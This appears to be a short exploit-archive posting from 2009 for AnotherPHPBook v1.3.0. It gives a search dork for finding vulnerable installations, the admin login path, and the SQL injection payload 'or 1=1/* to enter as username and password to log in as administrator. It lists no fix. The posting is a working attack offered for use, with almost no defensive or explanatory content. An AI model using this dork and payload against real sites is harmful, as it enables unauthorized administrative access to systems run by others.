AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability

2009-07-21 23:33:56

########################################################################

APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

########################################################################
# AUTHOR: n3w7u
#
## Download: www.clanscripte.net/main.php?content=download&do=dl&dlid=81
#
## Dorks: inurl:apbook/index.php
# or
# AnotherPHPBook (APB) v.1.3.0 © 2001 by Stephan Baumeister (zap)
#########################################################################
#
## Exploit:
#
# http://[host]/[path]/admin/index.php
#
# [!]
# Put as username and password: 'or 1=1/*
# You will log in as admin
#
#

#

Fixes

No fixes

In order to submit a new fix you need to be registered.